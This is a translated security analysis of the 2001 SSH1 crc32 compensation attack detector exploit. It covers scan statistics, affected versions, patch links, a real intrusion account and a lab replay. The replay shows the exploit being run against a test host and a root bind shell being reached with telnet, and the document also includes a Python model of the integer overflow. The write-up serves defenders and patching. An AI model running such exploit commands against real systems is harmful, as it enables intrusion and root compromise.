Analysis of the SSH crc32 compensation attack detector exploit
Source: http://xfocus.org   Author: xundi@xfocus.org
Since the SSH crc32 compensation attack detector exploit code began circulating, scanning
for SSH servers has increased steadily. The following is a statistical report:
+------------+------------+----------+----------+-----------+ 
| date       | #Probes    | #Sources | #Targets | #Scanners | 
+------------+------------+----------+----------+-----------+ 
| 2001-10-03 |       1466 |    45    |      987 |           | 
| 2001-10-04 |        319 |    25    |      212 |           | 
| 2001-10-05 |        825 |    22    |      783 |           | 
| 2001-10-06 |      86552 |    27    |    86305 |           |        
| 2001-10-07 |       7564 |    29    |     7429 |           | 
| 2001-10-08 |       2506 |    29    |     2449 |           | 
| 2001-10-09 |       1010 |    18    |      263 |           | 
| 2001-10-10 |        480 |    39    |      307 |           | 
| 2001-10-11 |        978 |    31    |      504 |           | 
| 2001-10-12 |        436 |    21    |      311 |           | 
| 2001-10-13 |       6731 |    27    |     6353 |           | 
| 2001-10-14 |       1411 |    29    |     1084 |           | 
| 2001-10-15 |        936 |    34    |      723 |           | 
| 2001-10-16 |       1358 |    40    |     1256 |           | 
| 2001-10-17 |       1098 |    36    |      899 |           | 
| 2001-10-18 |       1779 |    31    |     1438 |           | 
| 2001-10-19 |      19722 |    28    |    19573 |     7     | 
| 2001-10-20 |      25539 |    21    |    25419 |     3     | 
| 2001-10-21 |       6796 |    26    |     6750 |     9     | 
| 2001-10-22 |        807 |    30    |      482 |     5     | 
| 2001-10-23 |        578 |    49    |      327 |     6     | 
| 2001-10-24 |       2198 |    39    |     2025 |     9     | 
| 2001-10-25 |       2368 |    31    |     1759 |     6     | 
| 2001-10-26 |        712 |    37    |      591 |     7     | 
| 2001-10-27 |        463 |    30    |      297 |     8     | 
| 2001-10-28 |        495 |    30    |      263 |     5     | 
| 2001-10-29 |        478 |    37    |      399 |     5     | 
| 2001-10-30 |       1154 |    48    |     1051 |     5     | 
| 2001-10-31 |       1998 |    46    |     1047 |     5     | 
| 2001-11-01 |      66660 |    46    |    66386 |     5     | 
| 2001-11-02 |       1514 |    40    |      926 |     5     | 
| 2001-11-03 |       2142 |    36    |     2047 |     8     | 
| 2001-11-04 |       1233 |    26    |      781 |     9     | 
+------------+------------+----------+----------+-----------+ 
In view of this situation, this article compiles and translates David A. Dittrich's
<dittrich@cac.washington.edu> write-up (http://staff.washington.edu/dittrich/misc/ssh-analysis.txt)
for reference and for patching.
------------------------------------------------------------------------------- 
Overview
================== 
This vulnerability was first published by CORE-SDI in their security advisory
CORE-20010207, posted to the BUGTRAQ list at securityfocus.com and dated February 8, 2001:
http://www.securityfocus.com/advisories/3088
Briefly, the vulnerability is an integer overflow in a piece of code shipped with the ssh1
daemon. The problem is in deattack.c, written by CORE SDI to protect the SSH1 protocol
against the CRC32 compensation attack. In the detect_attack() function a 16-bit unsigned
variable is mistakenly used as if it were 32 bits wide, which causes the hash table index
to overflow. This lets an attacker overwrite arbitrary locations in memory, and may allow
a remote attacker to obtain root privileges.
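The following is an added example, not code from the article, from Dittrich's write-up, or from deattack.c itself. It models the hash-table sizing arithmetic of detect_attack() described above: the table size l is grown by quadrupling until it covers the packet, then stored into a 16-bit counter n, and the table is indexed with HASH(c) & (n - 1). The constants (HASH_MINSIZE, HASH_ENTRYSIZE, SSH_BLOCKSIZE, SSH_MAXBLOCKS) are taken from the published deattack.c as recalled by the author of this example and should be treated as assumptions; the point it shows is that for large packets the 16-bit store wraps to zero, so a zero-length table is indexed by an unmasked 32-bit value, and that the fix (widening n to 32 bits) keeps the index inside the allocation.

```python
# Added example (not from the article or from deattack.c itself): a model of the
# hash-table sizing arithmetic in detect_attack(), showing why a 16-bit counter
# under-allocates the table for large packets and why widening it to 32 bits
# closes the hole. The constants are taken from the published deattack.c as the
# author of this example recalls them; treat them as assumptions.

HASH_MINSIZE = 8192        # initial hash table size in bytes (assumed)
HASH_ENTRYSIZE = 2         # each entry is a u_int16_t block index (assumed)
SSH_BLOCKSIZE = 8          # SSH1 cipher block size
SSH_MAXBLOCKS = 32 * 1024  # largest packet, in blocks, the detector accepts (assumed)


def hash_factor(blocks):
    """HASH_FACTOR(x) is (x)*3/2 in C integer arithmetic."""
    return blocks * 3 // 2


def table_plan(packet_len, counter_bits=16):
    """Describe how detect_attack() would size and index its hash table.

    counter_bits=16 models the vulnerable declaration (static u_int16_t n);
    counter_bits=32 models the fix (n widened to u_int32_t).
    """
    if packet_len > SSH_MAXBLOCKS * SSH_BLOCKSIZE or packet_len % SSH_BLOCKSIZE:
        raise ValueError("detect_attack() rejects this packet length")
    blocks = packet_len // SSH_BLOCKSIZE

    # for (l = n; l < HASH_FACTOR(len / SSH_BLOCKSIZE); l = l << 2);
    l = HASH_MINSIZE // HASH_ENTRYSIZE
    while l < hash_factor(blocks):
        l <<= 2

    # n = l;  the store truncates l to the width of n
    n = l & ((1 << counter_bits) - 1)

    # The table is indexed with HASH(c) & (n - 1).  When n is 0 the C
    # expression n - 1 promotes to -1, so the mask is all ones and every
    # 32-bit hash value is accepted as an index into a zero-length table.
    index_mask = (n - 1) & 0xFFFFFFFF
    return {
        "requested_entries": l,
        "stored_n": n,
        "allocated_bytes": n * HASH_ENTRYSIZE,
        "max_index": index_mask,
        "index_exceeds_table": index_mask >= n,
    }


def smallest_wrapping_length():
    """Smallest packet length at which the 16-bit counter wraps to zero."""
    for packet_len in range(SSH_BLOCKSIZE, SSH_MAXBLOCKS * SSH_BLOCKSIZE + 1, SSH_BLOCKSIZE):
        if table_plan(packet_len, 16)["stored_n"] == 0:
            return packet_len
    return None


if __name__ == "__main__":
    for length in (8192, 87384, 87392, 262144):
        print(length, "16-bit:", table_plan(length, 16))
        print(length, "32-bit:", table_plan(length, 32))
    print("first wrapping length:", smallest_wrapping_length())
```

Running it shows that a packet of 8192 bytes gets a 4096-entry table either way, while once the requested size reaches 65536 entries the 16-bit model stores n = 0 and reports a maximum index of 0xFFFFFFFF against a zero-byte allocation; the 32-bit model stores 65536 and keeps the index below the table size.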
Other organizations have since published their own analyses of and recommendations for this SSH vulnerability, such as:
        http://xforce.iss.net/alerts/advise100.php  
        http://razor.bindview.com/publish/advisories/adv_ssh1crc.html  
        http://www.securityfocus.com/bugid=2347  
On October 21, 2001, Jay Dyson reported on the incidents@securityfocus.com mailing list
that there were many indications of someone scanning RIPE network ranges for SSH servers:
http://www.securityfocus.com/cgi-bin/archive.pl?id=75&start=2001-10-27&end=2001-11-02&mid=221998&threads=1  
Worse, a post on the vuln-dev@securityfocus.com mailing list pointed to a Newsbytes.com
news item about someone offering $1000 to whoever would supply this attack tool. There are
also unconfirmed rumors that exploit code for Solaris 8/SPARC with SSH.com 1.2.26-31 exists.
The well-known security site securitynewsportal.com was compromised through this
vulnerability; a screenshot of the defacement is at:
        http://defaced.alldas.de/mirror/2001/10/24/www.securitynewsportal.com/ 
TESO recently released a statement about this exploit code, which you can read at:
        http://www.team-teso.org/sshd_statement.php  
The affected SSH versions are:
SSH Communications Security SSH 2.x and 3.x (if SSH Version 1 fallback is enabled) 
SSH Communications Security SSH 1.2.23-1.2.31 
F-Secure SSH versions prior to 1.3.11-2 
OpenSSH versions prior to 2.3.0 (if SSH Version 1 fallback is enabled) 
OSSH 1.5.7 
Vendors have already released patch information; see the following addresses:
        http://www.ssh.com/products/ssh/advisories/ssh1_crc-32.cfm  
        http://openssh.org/security.html  
        http://www.cisco.com/warp/public/707/SSH-multiple-pub.html  
--------------------------------------------------------------------------- 
Analysis of the attack activity
===================== 
On October 6, 2001, an attacker coming from a network range in the Netherlands used the
crc32 compensation attack detector exploit to break into a Red Hat Linux system on the UW
network that was running OpenSSH 2.1.1; the vulnerability is described in CERT VU#945216:
        http://www.kb.cert.org/vuls/id/945216  
A series of operating system commands on the system were replaced with trojaned versions
to allow later re-entry, and all system logs were wiped. A second SSH server was run on
the high port 39999/tcp, and after the intrusion the system was used to scan networks
outside UW for more systems running OpenSSH 2.1.1.
After some recovery work, the exploit program was analyzed:
The exploit code is based on OpenSSH 2.2.0 (the release after 2.1.1, in which the crc32
compensation attack detection function was patched), but it targets OpenSSH 2.1.1; the
same code can also be used against ssh.com 1.2.31 (testing against other SSH protocol 1
implementations and versions has not been completed).
The exploit code targets the following systems:
        linux/x86 ssh.com 1.2.26-1.2.31 rhl  
        linux/x86 openssh 1.2.3 (maybe others)  
        linux/x86 openssh 2.2.0p1 (maybe others)  
        freebsd 4.x, ssh.com 1.2.26-1.2.31 rhl  
Although the exploit can attack several platforms, this attacker only scanned 22/tcp,
connected to the responding systems to obtain their version banner, and proceeded further
only against "OpenSSH_2.1.1". The scans were fast SYN scans using tools from the t0rn root kit.
Analysis of the compromised system showed that 47067 addresses had been scanned; of these,
1244 hosts were identified as having this vulnerability, and the attacker successfully used
it to enter 4 hosts before the system was taken offline on August 8.
The exploit code does not work against systems that use access control restrictions (e.g.
SSH.com's "AllowHosts" or "DenyHosts" settings) or packet filtering (e.g. ipchains,
iptables, ipf), because these require the public keys to be exchanged.
------------------------------------------------------------------------- 
Live analysis of the exploit code
============================ 
The exploit was tested on an isolated network segment using the address range 10.10.10.0/24;
the attacking host was 10.10.10.10 and the vulnerable server was 10.10.10.3.
The vulnerable server ran SSH.com version 1.2.31 on Red Hat Linux 6.0 (kernel 2.2.16-3 on
an i586).
The attacking host ran Fred Cohen's PLAC[1] (a Linux 2.4.5 system booted from CD-ROM), and
files were copied onto it with "nc" (Netcat)[2].
Replay from the attacker's side
========================= 
Running the exploit with no arguments prints its usage information:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
root@plac /bin >> ./ssh  
linux/x86 sshd1 exploit by zip/TESO (zip@james.kalifornia.com) - ripped from  
openssh 2.2.0 src  
greets: mray, random, big t, sh1fty, scut, dvorak  
ps. this sploit already owned cia.gov :/  
**please pick a type**  
Usage: ./ssh host [options]  
Options:  
  -p port  
  -b base Base address to start bruteforcing distance, by default 0x1800,  
goes as high as 0x10000  
  -t type  
  -d debug mode  
  -o Add this to delta_min  
types:  
0: linux/x86 ssh.com 1.2.26-1.2.31 rhl  
1: linux/x86 openssh 1.2.3 (maybe others)  
2: linux/x86 openssh 2.2.0p1 (maybe others)  
3: freebsd 4.x, ssh.com 1.2.26-1.2.31 rhl  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
The system under test ran SSH.com version 1.2.31 (unpatched) on port 2222, with its syslog
output redirected to a separate file, sshdx.log.
Type 0 and attack port 2222 were selected:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
root@plac /bin >> ./ssh 10.10.10.3 -p 2222 -t 0  
linux/x86 sshd1 exploit by zip/TESO (zip@james.kalifornia.com) - ripped from  
openssh 2.2.0 src  
greets: mray, random, big t, sh1fty, scut, dvorak  
ps. this sploit already owned cia.gov :/  
...........................  
bruteforced distance: 0x3200  
bruteforcing distance from h->partial packet buffer on stack  
..............^[[A................|////////\\\\!  
bruteforced h->ident buff distance: 5bfbed88  
trying retloc_delta: 35  
....!  
found high words of possible return address: 808  
trying to exploit  
....  
trying retloc_delta: 37  
.!  
found high words of possible return address: 805  
trying to exploit  
....  
trying retloc_delta: 39  
......  
trying retloc_delta: 3b  
......  
trying retloc_delta: 3d  
!  
found high words of possible return address: 804  
trying to exploit  
....  
trying retloc_delta: 3f  
......  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
At this point the exploit appeared to have "stopped"; going back to the attacked system, however, showed that a backdoor had been opened.
Replay from the victim system's side
======================= 
Before exploitation, the victim system showed the standard SSH daemon listening on 22/tcp
and the application under test listening on 2222/tcp, with the standard SSH daemon holding
one external connection (10.10.10.2:33354), as seen with netstat:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
[root@victim /root]# netstat -an --inet  
Active Internet connections (servers and established)  
Proto Recv-Q Send-Q Local Address Foreign Address State  
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN  
tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED  
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN  
raw 0 0 0.0.0.0:1 0.0.0.0:* 7  
raw 0 0 0.0.0.0:6 0.0.0.0:* 7  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
After the exploit "stopped", netstat showed the following listening state:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
[root@victim /root]# netstat -an --inet  
Active Internet connections (servers and established)  
Proto Recv-Q Send-Q Local Address Foreign Address State  
tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN  
tcp 0 0 10.10.10.3:2222 10.10.10.10:32965 ESTABLISHED  
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN  
tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED  
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN  
raw 0 0 0.0.0.0:1 0.0.0.0:* 7  
raw 0 0 0.0.0.0:6 0.0.0.0:* 7  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
A new service is found listening on 12345/tcp.
Going back to the attacking host and checking the network state with netstat shows that
the program attacks by brute-forcing addresses:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
[root@victim /root]# netstat -an --inet  
Active Internet connections (servers and established)  
Proto Recv-Q Send-Q Local Address Foreign Address State  
tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN  
tcp 1252 0 10.10.10.3:2222 10.10.10.10:33076 ESTABLISHED  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33075 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33074 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33072 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33071 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33069 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33067 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33066 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33064 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33063 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33062 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33061 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33060 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33059 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33058 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33056 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33055 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33053 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33051 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33050 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33048 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33047 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33046 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33042 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33041 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33040 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33039 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33038 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33036 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33035 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33034 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33033 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33032 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33030 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33029 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33028 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33027 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33024 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33023 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33022 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33021 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33020 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33016 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 10.10.10.10:33014 TIME_WAIT  
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN  
tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED  
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN  
raw 0 0 0.0.0.0:1 0.0.0.0:* 7  
raw 0 0 0.0.0.0:6 0.0.0.0:* 7  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
The LiSt Open Files ("lsof")[4] tool shows that the SSH daemon under test has opened a
new listening port:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
[root@victim /root]# lsof -p 9364  
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME  
sshd 9364 root cwd DIR 3,3 1024 2 /  
sshd 9364 root rtd DIR 3,3 1024 2 /  
sshd 9364 root txt REG 3,3 655038 442413 /usr/local/src/ssh-1.2.31/sbin/sshd1  
sshd 9364 root mem REG 3,3 340771 30722 /lib/ld-2.1.3.so  
sshd 9364 root mem REG 3,3 370141 31107 /lib/libnsl-2.1.3.so  
sshd 9364 root mem REG 3,3 66231 31103 /lib/libcrypt-2.1.3.so  
sshd 9364 root mem REG 3,3 47008 31113 /lib/libutil-2.1.3.so  
sshd 9364 root mem REG 3,3 4101836 31102 /lib/libc-2.1.3.so  
sshd 9364 root mem REG 3,3 246652 31109 /lib/libnss_files-2.1.3.so  
sshd 9364 root mem REG 3,3 252234 31111 /lib/libnss_nisplus-2.1.3.so  
sshd 9364 root mem REG 3,3 255963 31110 /lib/libnss_nis-2.1.3.so  
sshd 9364 root mem REG 3,3 67580 31108 /lib/libnss_dns-2.1.3.so  
sshd 9364 root mem REG 3,3 169720 31112 /lib/libresolv-2.1.3.so  
sshd 9364 root 0u CHR 1,3 4110 /dev/null  
sshd 9364 root 1u CHR 1,3 4110 /dev/null  
sshd 9364 root 2u CHR 1,3 4110 /dev/null  
sshd 9364 root 3u inet 10202 TCP *:12345 (LISTEN)  
sshd 9364 root 4u inet 10197 TCP 10.10.10.3:2222->10.10.10.10:33190 (CLOSE_WAIT)  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
Clearly the exploit succeeded in obtaining a ROOT SHELL, bound to a high TCP port.
The attacker can then use any "telnet" or "nc" tool to connect to this port and execute
arbitrary commands as the superuser, as shown below:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
root@plac ~ >> telnet 10.10.10.3 12345  
Trying 10.10.10.3...  
Connected to 10.10.10.3.  
Escape character is '^]'.  
id;  
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)  
date;  
Thu Nov 1 18:04:42 PST 2001  
netstat -an --inet;  
Active Internet connections (servers and established)  
Proto Recv-Q Send-Q Local Address Foreign Address State  
tcp 0 0 10.10.10.3:12345 10.10.10.10:33077 ESTABLISHED  
tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN  
tcp 1252 0 10.10.10.3:2222 10.10.10.10:33076 ESTABLISHED  
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN  
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN  
raw 0 0 0.0.0.0:1 0.0.0.0:* 7  
raw 0 0 0.0.0.0:6 0.0.0.0:* 7  
exit;  
Connection closed by foreign host.  
root@plac ~ >>  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
[Note]: with telnet, each command must be terminated with ";"; a connection made with nc does not need it.
After the attacker exits, the victim system's network state returns to normal:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
[root@victim /root]# netstat -an --inet  
Active Internet connections (servers and established)  
Proto Recv-Q Send-Q Local Address Foreign Address State  
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN  
tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED  
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN  
raw 0 0 0.0.0.0:1 0.0.0.0:* 7  
raw 0 0 0.0.0.0:6 0.0.0.0:* 7  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
If syslog logging is enabled, all of the connections and brute-force attempts are recorded
(note that this is SSH.com 1.2.31 on Red Hat Linux 6.0 -- the log messages differ from
those of OpenSSH):
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
Nov 1 18:46:14 victim sshd[9510]: log: Connection from 10.10.10.10 port 33298  
Nov 1 18:46:19 victim sshd[9511]: log: Connection from 10.10.10.10 port 33299  
Nov 1 18:46:22 victim sshd[9512]: log: Connection from 10.10.10.10 port 33300  
Nov 1 18:46:26 victim sshd[9513]: log: Connection from 10.10.10.10 port 33301  
Nov 1 18:46:31 victim sshd[9515]: log: Connection from 10.10.10.10 port 33302  
Nov 1 18:46:35 victim sshd[9516]: log: Connection from 10.10.10.10 port 33303  
Nov 1 18:46:39 victim sshd[9517]: log: Connection from 10.10.10.10 port 33304  
Nov 1 18:46:43 victim sshd[9518]: log: Connection from 10.10.10.10 port 33305  
Nov 1 18:46:47 victim sshd[9518]: fatal: Local: Corrupted check bytes on input.  
Nov 1 18:46:47 victim sshd[9519]: log: Connection from 10.10.10.10 port 33306  
Nov 1 18:46:52 victim sshd[9519]: fatal: Connection closed by remote host.  
Nov 1 18:46:53 victim sshd[9520]: log: Connection from 10.10.10.10 port 33307  
Nov 1 18:46:57 victim sshd[9521]: log: Connection from 10.10.10.10 port 33308  
Nov 1 18:47:01 victim sshd[9522]: log: Connection from 10.10.10.10 port 33309  
Nov 1 18:47:06 victim sshd[9523]: log: Connection from 10.10.10.10 port 33310  
Nov 1 18:47:10 victim sshd[9524]: log: Connection from 10.10.10.10 port 33311  
Nov 1 18:47:14 victim sshd[9525]: log: Connection from 10.10.10.10 port 33312  
Nov 1 18:47:19 victim sshd[9526]: log: Connection from 10.10.10.10 port 33313  
Nov 1 18:47:24 victim sshd[9527]: log: Connection from 10.10.10.10 port 33314  
Nov 1 18:47:24 victim sshd[9527]: fatal: Connection closed by remote host.  
Nov 1 18:47:46 victim sshd[9528]: log: Connection from 10.10.10.10 port 33315  
Nov 1 18:47:46 victim sshd[9529]: log: Connection from 10.10.10.10 port 33316  
Nov 1 18:47:47 victim sshd[9530]: log: Connection from 10.10.10.10 port 33317  
Nov 1 18:47:47 victim sshd[9531]: log: Connection from 10.10.10.10 port 33318  
Nov 1 18:47:47 victim sshd[9532]: log: Connection from 10.10.10.10 port 33319  
Nov 1 18:47:48 victim sshd[9533]: log: Connection from 10.10.10.10 port 33320  
Nov 1 18:47:48 victim sshd[9534]: log: Connection from 10.10.10.10 port 33321  
Nov 1 18:47:48 victim sshd[9535]: log: Connection from 10.10.10.10 port 33322  
Nov 1 18:47:49 victim sshd[9536]: log: Connection from 10.10.10.10 port 33323  
Nov 1 18:47:49 victim sshd[9537]: log: Connection from 10.10.10.10 port 33324  
Nov 1 18:47:50 victim sshd[9538]: log: Connection from 10.10.10.10 port 33325  
Nov 1 18:47:50 victim sshd[9539]: log: Connection from 10.10.10.10 port 33326  
Nov 1 18:47:50 victim sshd[9540]: log: Connection from 10.10.10.10 port 33327  
Nov 1 18:47:51 victim sshd[9541]: log: Connection from 10.10.10.10 port 33328  
Nov 1 18:47:51 victim sshd[9542]: log: Connection from 10.10.10.10 port 33329  
Nov 1 18:47:51 victim sshd[9543]: log: Connection from 10.10.10.10 port 33330  
Nov 1 18:47:52 victim sshd[9544]: log: Connection from 10.10.10.10 port 33331  
Nov 1 18:47:52 victim sshd[9545]: log: Connection from 10.10.10.10 port 33332  
Nov 1 18:47:52 victim sshd[9546]: log: Connection from 10.10.10.10 port 33333  
Nov 1 18:47:53 victim sshd[9547]: log: Connection from 10.10.10.10 port 33334  
Nov 1 18:47:53 victim sshd[9548]: log: Connection from 10.10.10.10 port 33335  
Nov 1 18:47:54 victim sshd[9549]: log: Connection from 10.10.10.10 port 33336  
Nov 1 18:47:54 victim sshd[9550]: log: Connection from 10.10.10.10 port 33337  
Nov 1 18:47:54 victim sshd[9551]: log: Connection from 10.10.10.10 port 33338  
Nov 1 18:47:55 victim sshd[9552]: log: Connection from 10.10.10.10 port 33339  
Nov 1 18:47:55 victim sshd[9553]: log: Connection from 10.10.10.10 port 33340  
Nov 1 18:47:55 victim sshd[9554]: log: Connection from 10.10.10.10 port 33341  
Nov 1 18:47:56 victim sshd[9555]: log: Connection from 10.10.10.10 port 33342  
Nov 1 18:47:56 victim sshd[9556]: log: Connection from 10.10.10.10 port 33343  
Nov 1 18:47:56 victim sshd[9555]: fatal: Local: Corrupted check bytes on input.  
Nov 1 18:47:57 victim sshd[9557]: log: Connection from 10.10.10.10 port 33344  
Nov 1 18:47:57 victim sshd[9558]: log: Connection from 10.10.10.10 port 33345  
Nov 1 18:47:57 victim sshd[9559]: log: Connection from 10.10.10.10 port 33346  
Nov 1 18:47:58 victim sshd[9560]: log: Connection from 10.10.10.10 port 33347  
Nov 1 18:47:58 victim sshd[9561]: log: Connection from 10.10.10.10 port 33348  
Nov 1 18:47:59 victim sshd[9562]: log: Connection from 10.10.10.10 port 33349  
Nov 1 18:47:59 victim sshd[9563]: log: Connection from 10.10.10.10 port 33350  
Nov 1 18:47:59 victim sshd[9564]: log: Connection from 10.10.10.10 port 33351  
Nov 1 18:48:00 victim sshd[9565]: log: Connection from 10.10.10.10 port 33352  
Nov 1 18:48:00 victim sshd[9566]: log: Connection from 10.10.10.10 port 33353  
Nov 1 18:48:00 victim sshd[9567]: log: Connection from 10.10.10.10 port 33354  
Nov 1 18:48:01 victim sshd[9568]: log: Connection from 10.10.10.10 port 33355  
Nov 1 18:48:01 victim sshd[9569]: log: Connection from 10.10.10.10 port 33356  
Nov 1 18:48:02 victim sshd[9570]: log: Connection from 10.10.10.10 port 33357  
Nov 1 18:48:02 victim sshd[9571]: log: Connection from 10.10.10.10 port 33358  
Nov 1 18:48:02 victim sshd[9572]: log: Connection from 10.10.10.10 port 33359  
Nov 1 18:48:03 victim sshd[9573]: log: Connection from 10.10.10.10 port 33360  
Nov 1 18:48:03 victim sshd[9574]: log: Connection from 10.10.10.10 port 33361  
Nov 1 18:48:03 victim sshd[9575]: log: Connection from 10.10.10.10 port 33362  
Nov 1 18:48:04 victim sshd[9576]: log: Connection from 10.10.10.10 port 33363  
Nov 1 18:48:04 victim sshd[9577]: log: Connection from 10.10.10.10 port 33364  
Nov 1 18:48:04 victim sshd[9578]: log: Connection from 10.10.10.10 port 33365  
Nov 1 18:48:05 victim sshd[9579]: log: Connection from 10.10.10.10 port 33366  
Nov 1 18:48:05 victim sshd[9580]: log: Connection from 10.10.10.10 port 33367  
Nov 1 18:48:06 victim sshd[9581]: log: Connection from 10.10.10.10 port 33368  
Nov 1 18:48:06 victim sshd[9582]: log: Connection from 10.10.10.10 port 33369  
Nov 1 18:48:06 victim sshd[9583]: log: Connection from 10.10.10.10 port 33370  
Nov 1 18:48:07 victim sshd[9584]: log: Connection from 10.10.10.10 port 33371  
Nov 1 18:48:07 victim sshd[9585]: log: Connection from 10.10.10.10 port 33372  
Nov 1 18:48:07 victim sshd[9586]: log: Connection from 10.10.10.10 port 33373  
Nov 1 18:48:08 victim sshd[9587]: log: Connection from 10.10.10.10 port 33374  
Nov 1 18:48:08 victim sshd[9586]: fatal: Local: crc32 compensation attack: network attack detected  
Nov 1 18:48:08 victim sshd[9588]: log: Connection from 10.10.10.10 port 33375  
Nov 1 18:48:08 victim sshd[9587]: fatal: Local: crc32 compensation attack: network attack detected  
Nov 1 18:48:08 victim sshd[9589]: log: Connection from 10.10.10.10 port 33376  
